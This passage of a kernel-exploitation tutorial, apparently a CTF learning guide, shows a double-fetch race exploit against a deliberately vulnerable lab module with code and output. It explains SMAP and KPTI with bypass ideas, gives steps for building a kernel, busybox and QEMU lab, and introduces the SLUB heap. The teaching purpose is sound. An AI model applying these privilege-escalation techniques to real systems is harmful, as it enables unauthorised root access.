    Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it runs in a thread, and the thread will be killed when the program exits (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).

    Compile the exploit and run it, and we get the desired result:

    Look how quick that was! Insane - two fails, then a success!

    hashtag
    Race Analysis

    You might be wondering how tight the race window can be for exploitation - well, gnote from TokyoWesterns CTF 2019 had a race of two assembly instructions:

    The dereferences of [rbx] have just one assembly instruction between them, yet we are capable of winning the race. THAT is just how tight it can be!

    SMAP

    Supervisor Mode Access Prevention

    SMAP is a more powerful version of SMEP. Instead of only preventing code in user space from being executed, SMAP places heavy restrictions on accessing user space at all, even for reading or writing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space, unless the access goes through a set of very specific functions.

    For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.

    This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).
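The snapshot idea can be sketched in userspace as follows. This is an illustration only: fake_copy_from_user is a hypothetical stand-in built on memcpy (the real copy_from_user is a kernel function that returns the number of bytes it could not copy), and the Credentials layout is assumed.

```c
#include <string.h>

#define PASSWORD "p4ssw0rd"

/* Hypothetical layout; the real struct is whatever the module defines. */
typedef struct {
    int id;
    char password[16];
} Credentials;

/* Stand-in for copy_from_user(): returns the number of bytes NOT copied. */
static unsigned long fake_copy_from_user(void *to, const void *from, unsigned long n) {
    memcpy(to, from, n);
    return 0;
}

/* Every check below runs on the private copy, so later changes by the
 * caller to *user_creds cannot influence the result. */
int snapshot_login(const Credentials *user_creds) {
    Credentials local;

    if (fake_copy_from_user(&local, user_creds, sizeof(local)) != 0)
        return -1;

    /* make sure the copied password is NUL-terminated before strcmp */
    local.password[sizeof(local.password) - 1] = '\0';

    if (local.id == 0)
        return -1;
    if (strcmp(local.password, PASSWORD) != 0)
        return -1;

    return local.id;
}
```

Because the ID is fetched from user memory exactly once, there is no window between the check and the use for a second thread to hit.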

    Like SMEP, SMAP is controlled by the CR4 register, in this case bit 21 (SMEP is bit 20). It is also pinned, so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass"; it depends on the challenge and simply has to be accounted for.
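As a small aid when reading a CR4 value (for example, one printed in a kernel crash log), the two bits can be tested like this. The helper names are made up for illustration; the bit positions are the architectural ones, with SMEP at bit 20 and SMAP at bit 21 counting from 0.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)  /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)  /* Supervisor Mode Access Prevention */

/* Hypothetical helpers: report whether each protection bit is set in a CR4 value. */
bool cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
bool cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }
```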

    Enabling SMAP is just as easy as SMEP:

    Sometimes it needs to be disabled instead, in which case the option is nosmap.

    hashtag
    Stac and Clac Instructions

    TODO

    hashtag
    Putting Exploit Data Into Kernel Memory instead of Userspace

    TODO

    KPTI

    Kernel Page Table Isolation

    KPTI is designed to protect against attacks that abuse the shared user/kernel address space. Originally called KAISER, it was created to mitigate Meltdown-style microarchitectural vulnerabilities.

    KPTI separates the page tables for user space and kernel space, creating two sets.

    • The first set, used by the kernel, includes a complete mapping of user space that the kernel can use for things like copy_to_user(). This page table has the NX bit set for userspace memory.

    • The user set maps the minimum amount of kernel virtual memory possible (e.g. exception handlers and code required for the user to transition to the kernel).

    You can disable KPTI from the command line via the nopti argument. It is also automatically disabled if the CPU is not affected by Meltdown.

    Compiling, Customising and booting the Kernel

    Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.

    circle-info

    This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.

    hashtag
    Prerequisites

    hashtag
    Consequences and Bypasses

    When in the user context, the kernel is not fully mapped. This doesn't affect most of our exploits, since they are executed in kernel mode.

    However, when in kernel mode, userspace is mapped as non-executable. This means that we can't simply iretq back to an escalate() function we defined in userspace while the kernel page tables are still loaded. The solution is to swap back to the user page tables first.

    To achieve this, we can abuse a function that is descriptively called swapgs_restore_regs_and_return_to_usermode. Disassembling it (TODO!), we see that it starts with a load of pop instructions, followed by a few mov and push instructions, then a page table switch, a swapgs and an iretq. We can jump to just after the pop instructions to avoid having to fill those registers in. This is commonly called a KPTI Trampoline.

    TODO example

    hashtag
    Bypassing KPTI via a SIGSEGV Handler

    Trying to return to user mode via iretq without switching page tables results in a SIGSEGV rather than a kernel crash, because by that point we are in userspace.

    An alternative method is therefore to register a SIGSEGV handler - the exploit gets root privileges, then tries to access userland and triggers a SIGSEGV. The kernel fault handler will switch the page tables for us when dispatching to the handler! A good example can be found here.

    TODO example

    KPTI arrow-up-right
    Meltdownarrow-up-right
    double_fetch_no_sleep.zip
    gnote from TokyoWesterns CTF 2019arrow-up-right
        -cpu qemu64,+smep,+smap
    pinned
    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;
    }
    
    printk("[Double-Fetch] Attempting login...");
    
    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;
    }
    Credentials creds;
    creds.id = 900;
    strcpy(creds.password, "p4ssw0rd");
    // don't want to make the loop infinite, just in case
    for (int i = 0; i < 1000000; i++) {
        // now we write the cred struct to the module
        res_id = write(fd, &creds, 0);
    
        // if res_id is 0, stop the race
        if (!res_id) {
            puts("[+] ID is 0!");
            break;
        }
    }
    void *switcher(void *arg) {
        volatile Credentials *creds = (volatile Credentials *)arg;
    
        while (1) {
            creds->id = 0;
            creds->id = 900;
        }
    }
    ~ $ ./exploit 
    FD: 3
    [    2.140099] [Double-Fetch] Attempted to log in as root!
    [    2.140099] [Double-Fetch] Attempted to log in as root!
    [+] ID is 0!
    [-] Finished race
    ; note that rbx is the buf argument, user-controlled
    cmp dword ptr [rbx], 5
    ja default_case
    mov eax, [rbx]
    mov rax, jump_table[rax*8]
    jmp rax
    circle-info

    There may be other requirements that I simply already had installed. Check here for the full list.

    hashtag
    The Kernel

    hashtag
    Cloning

    Use --depth 1 to only get the last commit.

    hashtag
    Customise

    Remove the current compilation configuration, as it is more complex than we need:

    Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.

    We create a kconfig file with the options we want to enable. An example is the following:

    chevron-rightExplanation of Optionshashtag
    • CONFIG_64BIT - compiles the kernel for 64-bit

    • CONFIG_SMP - symmetric multiprocessing; allows the kernel to run on multiple cores

    • CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps

    • CONFIG_PCI - enables support for the PCI bus

    • CONFIG_BLK_DEV_INITRD - enables support for loading an initial RAM disk (initramfs/initrd)

    • CONFIG_RD_GZIP - enables support for gzip-compressed initrd images

    • CONFIG_BINFMT_ELF - enables support for executing ELF binaries

    • CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line

    • CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs

    • CONFIG_INPUT - enables support for the generic input layer required for input device handling

    • CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework

    • CONFIG_INPUT_KEYBOARD - enables support for keyboards

    • CONFIG_MODULES - enables support for loading and unloading kernel modules

    • CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO

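    • CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging

    • CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - enables the 8250/16550 serial port driver and lets it act as the kernel console (needed for console=ttyS0 under QEMU)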

    • CONFIG_EMBEDDED - disables optimizations/features for embedded systems

    • CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem

    • CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses

    • CONFIG_RANDOMIZE_BASE - enables KASLR support

    • CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space

    In order to update the minimal .config with these options, we use the provided merge_config.sh script:

    hashtag
    Building

    That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.

    hashtag
    Kernel Modules

    When we compile kernel modules for our own kernel, we use the following Makefile structure:

    To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:

    The module is now compiled for the specific kernel version!

    hashtag
    Booting the Kernel in a Virtual Machine

    hashtag
    References

    • Build the Linux kernel and Busybox and run them on QEMUarrow-up-right

    • How to Build A Custom Linux Kernel For Qemu (2015 Edition)arrow-up-right

    hashtag
    Creating the File System and Executables

    We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.

    To do this, we use busyboxarrow-up-right, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.

    We will download and extract busybox; you can find the latest version herearrow-up-right.

    We also create an output folder for compiled versions.

    Now compile it statically. We're going to use the menuconfig option, so we can make some choices.

    Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.

    Now, make it with the new options:

    Now we make the file system.

    The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:

    Make it executable:

    Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.

    circle-exclamation
    • The -not -name '*.cpio' is there to prevent the archive from including itself (quote the pattern so the shell does not expand it before find sees it)

    • You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises

    If we want to extract the cpio archive (say, during a CTF) we can use this command:

    hashtag
    Loading it with QEMU

    Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:

    chevron-rightExplanation of Flagshashtag
    • -kernel bzImage - sets the kernel to be our compiled bzImage

    • -initrd initramfs.cpio - provide the file system

    • -append ... - basic features; in the future, this flag is also used to set protections

      • console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)

      • quiet - Only show critical messages from the kernel

    • -monitor /dev/null - Disable the QEMU monitor

    • -nographic - Disable GUI, operate in headless mode (faster)

    • -no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).

    Once we make this executable and run it, we get loaded into a VM!

    hashtag
    User Accounts

    Right now, we have a minimal Linux kernel we can boot, but if we try to work out who we are, it doesn't act quite as we expect it to:

    This is because /etc/passwd and /etc/group don't exist, so we can just create those!

    hashtag
    Loading the Kernel Module

    The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.

    First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).

    triangle-exclamation

    Here I am assuming that the major number of the double_fetch module is 253.

    Why am I doing that?

    If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
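One possible way to avoid hardcoding the number is to look the name up in /proc/devices before calling mknod. The sketch below only shows the lookup, written against text in the /proc/devices format; find_major is a hypothetical helper, and it assumes the module registers itself under the name double_fetch and that /proc is already mounted when the lookup runs.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: return the character-device major number registered
 * for `name` in /proc/devices-style text, or -1 if it is not listed. */
int find_major(const char *devices_text, const char *name) {
    const char *line = devices_text;

    while (*line) {
        int major;
        char dev[64];

        /* only the "Character devices:" section is of interest */
        if (strncmp(line, "Block devices:", 14) == 0)
            break;

        /* entries look like "253 double_fetch", with optional leading spaces */
        if (sscanf(line, "%d %63s", &major, dev) == 2 && strcmp(dev, name) == 0)
            return major;

        const char *nl = strchr(line, '\n');
        if (!nl)
            break;
        line = nl + 1;
    }
    return -1;
}
```

The returned value would then replace the fixed 253 passed to mknod. In the init script itself, the same lookup could be done by reading /proc/devices with the shell tools busybox provides, as long as /proc is mounted before the device node is created.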

    hashtag
    Compiling a Different Kernel Version

    If we want to compile a kernel version that is not the latest, we'll fetch all the tags:

    It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:

    We then continue from there.

    triangle-exclamation

    Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.

    Kernel Heap

    The pain of it all

    Historically, the Linux kernel has had three main heap allocators: SLOB, SLAB and SLUB.

    SLUB is the latest version, replacing SLAB as the default as of version 2.6.23. SLOB was used as the backup to SLAB and SLUB, but was removed in version 6.4. As a result, SLUB is all we really have to care about (even pre-6.4, SLOB was practically never used). From here on out, we will only talk about SLUB, unless explicitly stated.

    Note that, confusingly, "chunks" in the kernel heap are called objects and they are stored in slabs.

    hashtag

    $ apt-get install flex bison libelf-dev
    $ git clone https://github.com/torvalds/linux --depth=1
    $ cd linux
    $ rm -f .config
    $ make allnoconfig
      YACC    scripts/kconfig/parser.tab.[ch]
      HOSTCC  scripts/kconfig/lexer.lex.o
      HOSTCC  scripts/kconfig/menu.o
      HOSTCC  scripts/kconfig/parser.tab.o
      HOSTCC  scripts/kconfig/preprocess.o
      HOSTCC  scripts/kconfig/symbol.o
      HOSTCC  scripts/kconfig/util.o
      HOSTLD  scripts/kconfig/conf
    #
    # configuration written to .config
    #
    CONFIG_64BIT=y
    CONFIG_SMP=y
    CONFIG_PRINTK=y
    CONFIG_PRINTK_TIME=y
    
    CONFIG_PCI=y
    
    # We use an initramfs for busybox with elf binaries in it.
    CONFIG_BLK_DEV_INITRD=y
    CONFIG_RD_GZIP=y
    CONFIG_BINFMT_ELF=y
    CONFIG_BINFMT_SCRIPT=y
    
    # This is for /dev file system.
    CONFIG_DEVTMPFS=y
    
    # For the power-down button (triggered by qemu's `system_powerdown` command).
    CONFIG_INPUT=y
    CONFIG_INPUT_EVDEV=y
    CONFIG_INPUT_KEYBOARD=y
    
    CONFIG_MODULES=y
    
    CONFIG_KPROBES=n
    CONFIG_LTO_NONE=y
    CONFIG_SERIAL_8250=y
    CONFIG_SERIAL_8250_CONSOLE=y
    CONFIG_EMBEDDED=n
    CONFIG_TMPFS=y
    
    CONFIG_RELOCATABLE=y
    CONFIG_RANDOMIZE_BASE=y
    
    CONFIG_USERFAULTFD=y
    $ scripts/kconfig/merge_config.sh .config ../kconfig
    $ make -j4
    all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
    all:
        make -C /home/ir0nstone/linux M=$(PWD) modules
    $ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -
    $ mkdir busybox_compiled
    $ cd busybox-1.36.1
    $ make O=../busybox_compiled menuconfig
    $ cd ../busybox_compiled
    $ make -j
    $ make install
    $ cd ..
    $ mkdir initramfs
    $ cd initramfs
    $ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
    $ cp -av ../busybox_compiled/_install/* .
    $ sudo cp -av /dev/{null,console,tty,sda1} dev/
    #!/bin/sh
     
    mount -t proc none /proc
    mount -t sysfs none /sys
     
    echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
     
    exec /bin/sh
    $ chmod +x init
    $ find . -not -name '*.cpio' | cpio -o -H newc > initramfs.cpio
    $ cpio -i -F initramfs.cpio
    #!/bin/sh
    
    qemu-system-x86_64 \
        -kernel bzImage \
        -initrd initramfs.cpio \
        -append "console=ttyS0 quiet loglevel=3 oops=panic" \
        -monitor /dev/null \
        -nographic \
        -no-reboot
    ~ # whoami
    whoami: unknown uid 0
    /etc/passwd
    root:x:0:0:root:/root:/bin/sh
    user:x:1000:1000:User:/home/user:/bin/sh
    /etc/group
    root:x:0:
    user:x:1000:
    #!/bin/sh
    
    insmod /double_fetch.ko
    mknod /dev/double_fetch c 253 0
    chmod 666 /dev/double_fetch
    
    mount -t proc none /proc
    mount -t sysfs none /sys
    
    mknod -m 666 /dev/ttyS0 c 4 64
    
    setsid /bin/cttyhack setuidgid 1000 /bin/sh
    $ git fetch --tags
    $ git checkout v5.11
    - Only showing critical messages from the kernel
  • loglevel=3 - Only show error messages and higher-priority messages

  • oops=panic - Make the kernel panic immediately on an oops (kernel error)

  • allow better debuggingarrow-up-right
    Slabs and Caches

    Unlike the glibc heap, SLUB has fixed sizes for objects, which are powers of 2 up to 8192 along with 96 and 192. These are conveniently called kmalloc-8, kmalloc-16, kmalloc-32, kmalloc-64, kmalloc-96, kmalloc-128, kmalloc-192, kmalloc-256, kmalloc-512, kmalloc-1k, kmalloc-2k, kmalloc-4k and kmalloc-8k. We call these individual classifications caches, and they are made up of slabs.

    Each slab is assigned its own area of memory and is made up of 1 or more contiguous pages. If the kernel wants to allocate space in the heap, it will call kmalloc and pass it the size (and some flags). The size will be rounded up to fit in the smallest possible cache, then assigned there. Anything larger than 8192 bytes will not use these caches at all, and is served by the page allocator instead.
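The rounding rule can be written down as a small lookup. This is a sketch of the rule as described above, not kernel code: kmalloc_cache_size is a made-up name, and returning 0 is simply this example's way of saying "too large for any kmalloc cache".

```c
#include <stddef.h>

/* Hypothetical helper: object size of the smallest kmalloc cache that can
 * hold `size` bytes, or 0 if the request is larger than kmalloc-8k. */
size_t kmalloc_cache_size(size_t size) {
    static const size_t sizes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++) {
        if (size <= sizes[i])
            return sizes[i];
    }
    return 0;
}
```

So a 100-byte request lands in kmalloc-128, while a 65-byte request lands in kmalloc-96. This matters for exploitation because two objects can only be neighbours if their sizes round to the same cache.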

    This approach is a massive performance improvement. It can also make exploitation primitives harder, as every object is the same size and it's harder to overlap. Similarly, because the sizes are determined by the cache rather than metadata, we cannot fake size.

    hashtag
    Slab Creation

    We can get to a point where we have so many objects in a cache that they fill all of the slabs. In this case, a new slab is created. The new slab does not hold just the one requested object - it is filled with multiple objects. Why? Because the kernel knows that this slab will only ever be used for objects of one cache (say, kmalloc-1k), it creates all possible objects immediately, hands one out, and marks the remainder as free.

    These remaining objects are saved in the freelist in a random order, provided that the configuration CONFIG_SLAB_FREELIST_RANDOM is enabled (which it commonly is on distribution kernels).

    The default size of slabs depends on the cache it is being used for. You can read /proc/slabinfo to see the current configuration for the system:

    Here objsize is the size of each object in the cache, and objperslab is the number of objects created at once when a new slab is initialized. Then pagesperslab is the product of objsize/0x1000 (pages per object) and objperslab, rounded up to a whole number of pages, and tells you how many pages each slab has.
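The relationship between the three columns can be checked with a few lines of arithmetic. This is only the formula from the paragraph above with the result rounded up to whole pages; pages_per_slab is a made-up helper and a 0x1000-byte page is assumed.

```c
#include <stddef.h>

#define PAGE_SIZE_BYTES 0x1000  /* assumed 4 KiB pages */

/* Hypothetical helper: pages needed to hold objperslab objects of objsize
 * bytes each, rounded up to a whole number of pages. */
size_t pages_per_slab(size_t objsize, size_t objperslab) {
    size_t bytes = objsize * objperslab;
    return (bytes + PAGE_SIZE_BYTES - 1) / PAGE_SIZE_BYTES;
}
```

For kmalloc-1k this gives 1024 * 16 = 16384 bytes, which is 4 pages. For kmalloc-192 it gives 192 * 21 = 4032 bytes, which does not fill a page exactly but still occupies 1 page.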

    TODO CONFIG_SLAB_FREELIST_HARDENED.

    hashtag
    The Kernel Heap is Global

    One major difference between user- and kernel-mode heap exploitation is that the kernel heap is shared between all kernel processes. Kernel modules and every other aspect of the kernel use the same heap.

    So, let's say you find some sort of kernel heap primitive - an overflow, for example. Overflowing into identical objects might not be helpful, but in the kernel, we can find common structs with powerful primitives that we can use to our advantage. Imagine that there is a struct that contains a function pointer, and you can trigger a call to this function. If this struct is allocated to the same cache as the object you can overflow, it is possible to allocate this struct such that it occupies the object located directly after yours in memory. Suddenly the overflow is incredibly powerful, and can lead immediately to something like a ret2usr.

    version 2.6.23arrow-up-right
    version 6.4arrow-up-right
    $ sudo cat /proc/slabinfo
    # name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> [...]
    [...]
    kmalloc-8k            80            80        8192          4            8
    kmalloc-4k           208           208        4096          8            8
    kmalloc-2k           768           768        2048         16            8
    kmalloc-1k          1296          1296        1024         16            4
    kmalloc-512         2190          2224         512         16            2
    kmalloc-256         1917          1936         256         16            1
    kmalloc-128         1024          1024         128         32            1
    kmalloc-64          7532          7936          64         64            1
    kmalloc-32          6442          6528          32        128            1
    kmalloc-16         10123         10240          16        256            1
    kmalloc-8           5120          5120           8        512            1
    kmalloc-192         3885          3885         192         21            1
    kmalloc-96          3506          4158          96         42            1